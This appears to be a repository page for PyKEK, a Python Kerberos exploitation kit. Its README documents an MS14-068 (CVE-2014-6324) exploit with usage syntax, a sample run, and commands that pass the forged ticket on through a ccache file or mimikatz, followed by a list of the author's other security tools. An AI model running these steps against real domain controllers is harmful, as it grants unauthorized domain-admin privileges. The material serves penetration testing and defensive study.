mubix/pykek

Stars
125
Rank 286,335 (Top 6 %)
Language
Python
Created almost 10 years ago
Updated almost 10 years ago

mubix/pykek

mubix

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Kerberos Exploitation Kit

Python Kerberos Exploitation Kit

PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)

For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .

More is coming...

Author

Sylvain Monné

Contact : sylvain dot monne at solucom dot fr

http://twitter.com/bidord

Library content

kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions
kek.ccache: Credential Cache Binary Format (cchache)
kek.pac: Microsoft Privilege Attribute Certificate Data Structure (MS-PAC)
kek.crypto: Kerberos and MS specific cryptographic functions

Exploits

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

Usage :

USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:
    -p <clearPassword>
 --rc4 <ntlmHash>

Example usage :

Linux (tested with samba and MIT Kerberos)

root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file '[email protected]'... Done!
root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc [email protected]" exit`

post-exploitation

Post Exploitation Collection

shellshocker-pocs

Collection of Proof of Concepts and Potential Targets for #ShellShocker

post-exploitation-wiki

Post Exploitation Wiki

solarflare

SolarWinds Orion Account Audit / Password Dumping Utility

netview

Netview enumerates systems using WinAPI calls

vt-notify

Get email notification when Virus Total has a copy of your binary.

CVE-2021-44228-Log4Shell-Hashes

Hashes for vulnerable LOG4J versions

IOXIDResolver

IOXIDResolver.py from AirBus Security

osx-wificleaner

Cleans out "open" wireless connections from OSX machine

howtowinccdc

Notes, Slides, Comments and Commands on How to Win CCDC

akb

Attack Knowledge Base

cfdb

Common Findings Database

Not-In-Pentesting-Class

The Dirty Secrets They Didn't Teach You In Pentesting Class

repos

List of Repositories

open-ssids

SSIDs for the Hak5 Wifi Pineapple's PineAP setup

ditto

Binary resource copier

WhiteChapel

password cracking front end

sectaskbars

Security Product Taskbar Icons (to identify from screenshots)

tools

Operational toolset utilizing git's submodule feature

FakeNetBIOS

stuff

Things I've coded, or use (cause I can't find them online anymore)

DeleteThatTweet

Monitors a Twitter stream and saves off any tweet that is deleted.

manage2decrypt

ManageEngine OpManager Decryption Tools

windows-hardening

Because I can't find scripts to do this anywhere else...

windows-declutter

Windows 10 De-Clutter script

ccdc_malware

Talk given at DerbyCon and RuxCon 2016

mubix.github

Malicious Link Blog

local-hibp

How to set up a local copy of Have-I-Been-Pwned's password checking service

whitechapel-ng

Next Generation of White Chapel

attackbox

Ansible scripts to build an attack box

lmo

LetMeOutOfYour.net Resources

metasploitwiki

Clone of Metasploit's wiki w/ additions

Interceptor

PowerShell HTTP(s) Intercepting Proxy

hackingtogether

#HackingTogether

securitytitles.com

Standardizing Security Titles

ctf

Capture The Flag Information

GScriptOldEmal

Deletes old email from my Gmail accounts

twitter-list-follow

Follow all members of a list

elgamalcrypto

Simple Python Elgamal Encryption and Decryption Tool

presentations

Public copies of my previous presentations

bliizard_escalation

decryptcpuu

Decrypt "Unrestricted" CPUU.ini passwords

ctfjournal.com

CTF Journal Blog - All are welcome

twitterfriendsopml

Generate an OPML based on the URLs in the people you follow on Twitter's bios

portals

Repository of captive portals from around the world

8021xbridge

Automatically exported from code.google.com/p/8021xbridge

disappeared

Repo of sites and tools that went %POOF%

meterpy

Meterpreter On-target Python Scripts

random-scripts

Just random scripts of things I don't want to lose

squirtle

A fork of the Squirtle project from: http://code.google.com/p/squirtle/

PowerWorm

Analysis, detection, and removal of the "Power Worm" PowerShell-based malware

mubix

ntlmv1des

Cracks DES C3 piece of NTLMv1 and combines into Crack.sh format

epilogue

ShmooCon Epilogue Website